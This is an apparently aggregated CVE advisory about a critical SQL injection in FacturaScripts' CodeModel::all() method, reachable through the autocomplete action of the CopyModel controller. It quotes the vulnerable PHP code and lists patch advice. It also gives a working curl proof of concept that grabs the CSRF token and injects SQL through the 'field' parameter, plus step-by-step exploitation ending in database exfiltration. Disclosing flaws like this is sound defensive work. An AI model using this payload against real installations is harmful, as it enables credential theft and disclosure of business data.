FacturaScripts, SQL Injection, Critical

Listen to this Post

The vulnerability exists in the `CodeModel::all()` method within /Core/Model/CodeModel.php. User-supplied parameters (source, fieldcode, field) passed to autocomplete actions in controllers like `CopyModel` are directly concatenated into an SQL query string without sanitization or prepared statements. This allows an authenticated attacker to inject arbitrary SQL commands via the `field` parameter. The injected SQL is executed when the application calls self::db()->selectLimit($sql, ...), enabling complete database disclosure including user credentials and business data.

dailycve form:

Platform: FacturaScripts
Version: Affects multiple
Vulnerability: SQL Injection
Severity: Critical
date: Not specified

Prediction: Patch expected soon

What Undercode Say:

TOKEN=$(curl -s -L -c cookies.txt “http://localhost:8091/login” | grep -Po ‘name=”multireqtoken” value=”\K[^”]+’)
curl -s -b cookies.txt “http://localhost:8091/CopyModel” \
-d “action=autocomplete” \
-d “source=users” \
-d “fieldcode=nick” \
-d “field=version()” \
-d “multireqtoken=$TOKEN”
public static function all(string $tableName, string $fieldCode, string $fieldDescription, bool $addEmpty = true, array $where = []): array
{
$sql = ‘SELECT DISTINCT ‘ . $fieldCode . ‘ AS code, ‘ . $fieldDescription . ‘ AS description ‘
. ‘FROM ‘ . $tableName . Where::multiSqlLegacy($where) . ‘ ORDER BY 2 ASC’;
}

How Exploit:

Authenticate to application.

Obtain CSRF token (`multireqtoken`).

Send POST to `/CopyModel`.

Inject SQL via `field` parameter.

Exfiltrate database contents.

Protection from this CVE

Implement parameterized queries.

Escape user inputs.

Validate table/column names.

Impact:

Complete database disclosure.

Credential theft.

Business data loss.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top